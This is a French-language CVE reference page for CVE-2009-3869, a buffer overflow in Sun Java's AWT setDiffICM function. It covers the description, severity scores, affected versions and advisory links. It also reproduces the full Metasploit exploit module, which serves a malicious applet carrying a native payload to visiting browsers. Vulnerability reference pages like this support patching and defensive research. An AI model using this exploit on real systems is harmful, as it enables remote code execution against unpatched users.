CVE-2009-3869 : Détail

CVE-2009-3869

Overflow
93.04%V3
Network
2009-11-05
15h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in the setDiffICM function in the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a crafted argument, aka Bug Id 6872357.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16298

Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: java_setdifficm_bof.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow', 'Description' => %q{ This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2009-3869' ], [ 'OSVDB', '59710' ], [ 'BID', '36881' ], [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ], ], 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, }, 'Targets' => [ =begin No automatic targetting for now ... [ 'J2SE 1.6_16 Automatic', { 'Platform' => ['win', 'linux', 'osx'], 'Arch' => [ARCH_X86, ARCH_PPC] } ], =end [ 'J2SE 1.6_16 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'J2SE 1.6_16 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'J2SE 1.6_16 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2009' )) end def on_request_uri(cli, req) # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] else print_status("Unknown target for: #{req.headers['User-Agent']}") end end # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end rmq.each {|addr| @targetcache.delete(addr) } # Request processing if (not req.uri.match(/\.jar$/i)) # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) print_status("Sending redirect so path ends with / ...") send_redirect(cli, get_resource() + '/', '') return end # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(payload.encoded), { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) return end # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end def generate_html(pl) html = <<-EOF <html> <head> <!-- <meta http-equiv=refresh content=10 /> --> </head> <body> <applet width='100%' height='100%' code='AppletX' archive='JARNAME'> <param name='sc' value='SCODE' /> <param name='np' value='NOPS' /> </applet> </body> </html> EOF # finalize html jar_name = rand_text_alphanumeric(32)+".jar" html.gsub!(/JARNAME/, jar_name) # put payload into html debug_payload = false pload = "" pload << "\xcc" if debug_payload pload << pl if ((pload.length % 4) > 0) pload << rand_text((4 - (pload.length % 4))) end if debug_payload print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) end html.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) # put nops into html nops = "\x90\x90\x90\x90" html.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops)) return html end def exploit path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar") fd = File.open(path, "rb") @jar_data = fd.read(fd.stat.size) fd.close super end def generate_applet(cli, req) this_target = nil if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else return '' end else this_target = target end return @jar_data end end

Products Mentioned

Configuraton 0

Sun>>Jdk >> Version 1.5.0

    Sun>>Jdk >> Version 1.5.0

      Sun>>Jdk >> Version 1.5.0

        Sun>>Jdk >> Version 1.5.0

          Sun>>Jdk >> Version 1.5.0

            Sun>>Jdk >> Version 1.5.0

              Sun>>Jdk >> Version 1.5.0

                Sun>>Jdk >> Version 1.5.0

                  Sun>>Jdk >> Version 1.5.0

                    Sun>>Jdk >> Version 1.5.0

                      Sun>>Jdk >> Version 1.5.0

                        Sun>>Jdk >> Version 1.5.0

                          Sun>>Jdk >> Version 1.5.0

                            Sun>>Jdk >> Version 1.5.0

                              Sun>>Jdk >> Version 1.5.0

                                Sun>>Jdk >> Version 1.5.0

                                  Sun>>Jdk >> Version 1.5.0

                                    Sun>>Jdk >> Version 1.5.0

                                      Sun>>Jdk >> Version 1.5.0

                                        Sun>>Jdk >> Version 1.5.0

                                          Sun>>Jdk >> Version 1.5.0

                                            Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                              Sun>>Jdk >> Version 1.6.0

                                                Sun>>Jdk >> Version 1.6.0

                                                  Sun>>Jre >> Version 1.5.0

                                                    Sun>>Jre >> Version 1.5.0

                                                      Sun>>Jre >> Version 1.5.0

                                                        Sun>>Jre >> Version 1.5.0

                                                          Sun>>Jre >> Version 1.5.0

                                                            Sun>>Jre >> Version 1.5.0

                                                              Sun>>Jre >> Version 1.5.0

                                                                Sun>>Jre >> Version 1.5.0

                                                                  Sun>>Jre >> Version 1.5.0

                                                                    Sun>>Jre >> Version 1.5.0

                                                                      Sun>>Jre >> Version 1.5.0

                                                                        Sun>>Jre >> Version 1.5.0

                                                                          Sun>>Jre >> Version 1.5.0

                                                                            Sun>>Jre >> Version 1.5.0

                                                                              Sun>>Jre >> Version 1.5.0

                                                                                Sun>>Jre >> Version 1.5.0

                                                                                  Sun>>Jre >> Version 1.5.0

                                                                                    Sun>>Jre >> Version 1.5.0

                                                                                      Sun>>Jre >> Version 1.5.0

                                                                                        Sun>>Jre >> Version 1.5.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                          Sun>>Jre >> Version 1.6.0

                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                            Configuraton 0

                                                                                            Sun>>Jre >> Version 1.4.2_1

                                                                                            Sun>>Jre >> Version 1.4.2_2

                                                                                            Sun>>Jre >> Version 1.4.2_02

                                                                                            Sun>>Jre >> Version 1.4.2_03

                                                                                            Sun>>Jre >> Version 1.4.2_3

                                                                                            Sun>>Jre >> Version 1.4.2_4

                                                                                            Sun>>Jre >> Version 1.4.2_04

                                                                                            Sun>>Jre >> Version 1.4.2_05

                                                                                            Sun>>Jre >> Version 1.4.2_5

                                                                                            Sun>>Jre >> Version 1.4.2_06

                                                                                            Sun>>Jre >> Version 1.4.2_6

                                                                                            Sun>>Jre >> Version 1.4.2_7

                                                                                            Sun>>Jre >> Version 1.4.2_07

                                                                                            Sun>>Jre >> Version 1.4.2_8

                                                                                            Sun>>Jre >> Version 1.4.2_08

                                                                                            Sun>>Jre >> Version 1.4.2_09

                                                                                            Sun>>Jre >> Version 1.4.2_9

                                                                                            Sun>>Jre >> Version 1.4.2_10

                                                                                            Sun>>Jre >> Version 1.4.2_11

                                                                                            Sun>>Jre >> Version 1.4.2_12

                                                                                            Sun>>Jre >> Version 1.4.2_13

                                                                                            Sun>>Jre >> Version 1.4.2_14

                                                                                            Sun>>Jre >> Version 1.4.2_15

                                                                                            Sun>>Jre >> Version 1.4.2_16

                                                                                            Sun>>Jre >> Version 1.4.2_17

                                                                                            Sun>>Jre >> Version 1.4.2_18

                                                                                            Sun>>Jre >> Version 1.4.2_19

                                                                                            Sun>>Jre >> Version 1.4.2_20

                                                                                            Sun>>Jre >> Version 1.4.2_21

                                                                                            Sun>>Jre >> Version 1.4.2_22

                                                                                            Sun>>Sdk >> Version 1.4.2_01

                                                                                            Sun>>Sdk >> Version 1.4.2_1

                                                                                            Sun>>Sdk >> Version 1.4.2_2

                                                                                            Sun>>Sdk >> Version 1.4.2_02

                                                                                            Sun>>Sdk >> Version 1.4.2_03

                                                                                            Sun>>Sdk >> Version 1.4.2_3

                                                                                            Sun>>Sdk >> Version 1.4.2_04

                                                                                            Sun>>Sdk >> Version 1.4.2_4

                                                                                            Sun>>Sdk >> Version 1.4.2_5

                                                                                            Sun>>Sdk >> Version 1.4.2_05

                                                                                            Sun>>Sdk >> Version 1.4.2_6

                                                                                            Sun>>Sdk >> Version 1.4.2_06

                                                                                            Sun>>Sdk >> Version 1.4.2_07

                                                                                            Sun>>Sdk >> Version 1.4.2_7

                                                                                            Sun>>Sdk >> Version 1.4.2_8

                                                                                            Sun>>Sdk >> Version 1.4.2_08

                                                                                            Sun>>Sdk >> Version 1.4.2_09

                                                                                            Sun>>Sdk >> Version 1.4.2_9

                                                                                            Sun>>Sdk >> Version 1.4.2_10

                                                                                            Sun>>Sdk >> Version 1.4.2_11

                                                                                            Sun>>Sdk >> Version 1.4.2_12

                                                                                            Sun>>Sdk >> Version 1.4.2_13

                                                                                            Sun>>Sdk >> Version 1.4.2_14

                                                                                            Sun>>Sdk >> Version 1.4.2_15

                                                                                            Sun>>Sdk >> Version 1.4.2_16

                                                                                            Sun>>Sdk >> Version 1.4.2_17

                                                                                            Sun>>Sdk >> Version 1.4.2_18

                                                                                            Sun>>Sdk >> Version 1.4.2_19

                                                                                            Sun>>Sdk >> Version 1.4.2_20

                                                                                            Sun>>Sdk >> Version 1.4.2_21

                                                                                            Sun>>Sdk >> Version 1.4.2_22

                                                                                            Sun>>Solaris >> Version *

                                                                                            Configuraton 0

                                                                                            Sun>>Jre >> Version 1.3.1_1

                                                                                              Sun>>Jre >> Version 1.3.1_01

                                                                                                Sun>>Jre >> Version 1.3.1_01a

                                                                                                  Sun>>Jre >> Version 1.3.1_02

                                                                                                    Sun>>Jre >> Version 1.3.1_2

                                                                                                    Sun>>Jre >> Version 1.3.1_03

                                                                                                    Sun>>Jre >> Version 1.3.1_3

                                                                                                      Sun>>Jre >> Version 1.3.1_4

                                                                                                        Sun>>Jre >> Version 1.3.1_04

                                                                                                        Sun>>Jre >> Version 1.3.1_05

                                                                                                        Sun>>Jre >> Version 1.3.1_5

                                                                                                          Sun>>Jre >> Version 1.3.1_06

                                                                                                          Sun>>Jre >> Version 1.3.1_6

                                                                                                            Sun>>Jre >> Version 1.3.1_07

                                                                                                            Sun>>Jre >> Version 1.3.1_7

                                                                                                              Sun>>Jre >> Version 1.3.1_8

                                                                                                                Sun>>Jre >> Version 1.3.1_08

                                                                                                                Sun>>Jre >> Version 1.3.1_9

                                                                                                                  Sun>>Jre >> Version 1.3.1_09

                                                                                                                  Sun>>Jre >> Version 1.3.1_10

                                                                                                                  Sun>>Jre >> Version 1.3.1_11

                                                                                                                  Sun>>Jre >> Version 1.3.1_12

                                                                                                                  Sun>>Jre >> Version 1.3.1_13

                                                                                                                  Sun>>Jre >> Version 1.3.1_14

                                                                                                                  Sun>>Jre >> Version 1.3.1_15

                                                                                                                  Sun>>Jre >> Version 1.3.1_16

                                                                                                                  Sun>>Jre >> Version 1.3.1_17

                                                                                                                  Sun>>Jre >> Version 1.3.1_18

                                                                                                                  Sun>>Jre >> Version 1.3.1_19

                                                                                                                  Sun>>Jre >> Version 1.3.1_20

                                                                                                                  Sun>>Jre >> Version 1.3.1_21

                                                                                                                  Sun>>Jre >> Version 1.3.1_22

                                                                                                                  Sun>>Jre >> Version 1.3.1_23

                                                                                                                  Sun>>Jre >> Version 1.3.1_24

                                                                                                                  Sun>>Jre >> Version 1.3.1_25

                                                                                                                  Sun>>Sdk >> Version 1.3.1_01

                                                                                                                  Sun>>Sdk >> Version 1.3.1_01a

                                                                                                                  Sun>>Sdk >> Version 1.3.1_2

                                                                                                                    Sun>>Sdk >> Version 1.3.1_02

                                                                                                                    Sun>>Sdk >> Version 1.3.1_03

                                                                                                                    Sun>>Sdk >> Version 1.3.1_3

                                                                                                                      Sun>>Sdk >> Version 1.3.1_4

                                                                                                                        Sun>>Sdk >> Version 1.3.1_04

                                                                                                                        Sun>>Sdk >> Version 1.3.1_5

                                                                                                                          Sun>>Sdk >> Version 1.3.1_05

                                                                                                                          Sun>>Sdk >> Version 1.3.1_6

                                                                                                                            Sun>>Sdk >> Version 1.3.1_06

                                                                                                                            Sun>>Sdk >> Version 1.3.1_7

                                                                                                                              Sun>>Sdk >> Version 1.3.1_07

                                                                                                                              Sun>>Sdk >> Version 1.3.1_8

                                                                                                                                Sun>>Sdk >> Version 1.3.1_08

                                                                                                                                Sun>>Sdk >> Version 1.3.1_9

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_09

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_10

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_11

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_12

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_13

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_14

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_15

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_16

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_17

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_18

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_19

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_20

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_21

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_22

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_23

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_24

                                                                                                                                  Sun>>Sdk >> Version 1.3.1_25

                                                                                                                                  Microsoft>>Windows >> Version *

                                                                                                                                  Configuraton 0

                                                                                                                                  Sun>>Java_se >> Version *

                                                                                                                                    Sun>>Jdk >> Version 1.5.0

                                                                                                                                      Sun>>Jdk >> Version 1.5.0

                                                                                                                                        Sun>>Jdk >> Version 1.5.0

                                                                                                                                          Sun>>Jdk >> Version 1.5.0

                                                                                                                                            Sun>>Jdk >> Version 1.5.0

                                                                                                                                              Sun>>Jdk >> Version 1.5.0

                                                                                                                                                Sun>>Jdk >> Version 1.5.0

                                                                                                                                                  Sun>>Jdk >> Version 1.5.0

                                                                                                                                                    Sun>>Jdk >> Version 1.5.0

                                                                                                                                                      Sun>>Jdk >> Version 1.5.0

                                                                                                                                                        Sun>>Jdk >> Version 1.5.0

                                                                                                                                                          Sun>>Jdk >> Version 1.5.0

                                                                                                                                                            Sun>>Jdk >> Version 1.5.0

                                                                                                                                                              Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                  Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                    Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                      Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                        Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                          Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                            Sun>>Jdk >> Version 1.5.0

                                                                                                                                                                              Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                  Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                    Sun>>Jdk >> Version 1.6.0

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_01

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_1

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_2

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_02

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_03

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_3

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_4

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_04

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_05

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_5

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_06

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_6

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_7

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_07

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_8

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_08

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_09

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_9

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_10

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_11

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_12

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_13

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_14

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_15

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_16

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_17

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_18

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_19

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_20

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_21

                                                                                                                                                                                    Sun>>Jre >> Version 1.4.2_22

                                                                                                                                                                                    Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                      Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                        Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                          Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                            Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                              Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                  Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                    Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                      Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                        Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                          Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                            Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                              Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                  Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                    Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                      Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                        Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                          Sun>>Jre >> Version 1.5.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                            Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                              Sun>>Jre >> Version 1.6.0

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_1

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_2

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_02

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_03

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_3

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_04

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_4

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_5

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_05

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_6

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_06

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_07

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_7

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_8

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_08

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_09

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_9

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_10

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_11

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_12

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_13

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_14

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_15

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_16

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_17

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_18

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_19

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_20

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_21

                                                                                                                                                                                                                              Sun>>Sdk >> Version 1.4.2_22

                                                                                                                                                                                                                              Références

                                                                                                                                                                                                                              http://marc.info/?l=bugtraq&m=126566824131534&w=2
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_HP
                                                                                                                                                                                                                              http://www.securityfocus.com/bid/36881
                                                                                                                                                                                                                              Tags : vdb-entry, x_refsource_BID
                                                                                                                                                                                                                              http://support.apple.com/kb/HT3970
                                                                                                                                                                                                                              Tags : x_refsource_CONFIRM
                                                                                                                                                                                                                              http://marc.info/?l=bugtraq&m=134254866602253&w=2
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_HP
                                                                                                                                                                                                                              http://support.apple.com/kb/HT3969
                                                                                                                                                                                                                              Tags : x_refsource_CONFIRM
                                                                                                                                                                                                                              http://marc.info/?l=bugtraq&m=131593453929393&w=2
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_HP
                                                                                                                                                                                                                              http://security.gentoo.org/glsa/glsa-200911-02.xml
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_GENTOO
                                                                                                                                                                                                                              http://www.redhat.com/support/errata/RHSA-2009-1694.html
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                                                                                                                                              http://secunia.com/advisories/37231
                                                                                                                                                                                                                              Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                                                                                                                                              http://marc.info/?l=bugtraq&m=126566824131534&w=2
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_HP
                                                                                                                                                                                                                              http://securitytracker.com/id?1023132
                                                                                                                                                                                                                              Tags : vdb-entry, x_refsource_SECTRACK
                                                                                                                                                                                                                              http://marc.info/?l=bugtraq&m=131593453929393&w=2
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_HP
                                                                                                                                                                                                                              http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_SUNALERT
                                                                                                                                                                                                                              http://www.vupen.com/english/advisories/2009/3131
                                                                                                                                                                                                                              Tags : vdb-entry, x_refsource_VUPEN
                                                                                                                                                                                                                              http://secunia.com/advisories/37581
                                                                                                                                                                                                                              Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                                                                                                                                              http://secunia.com/advisories/37841
                                                                                                                                                                                                                              Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                                                                                                                                              http://secunia.com/advisories/37239
                                                                                                                                                                                                                              Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                                                                                                                                              http://www.mandriva.com/security/advisories?name=MDVSA-2010:084
                                                                                                                                                                                                                              Tags : vendor-advisory, x_refsource_MANDRIVA
                                                                                                                                                                                                                              http://secunia.com/advisories/37386
                                                                                                                                                                                                                              Tags : third-party-advisory, x_refsource_SECUNIA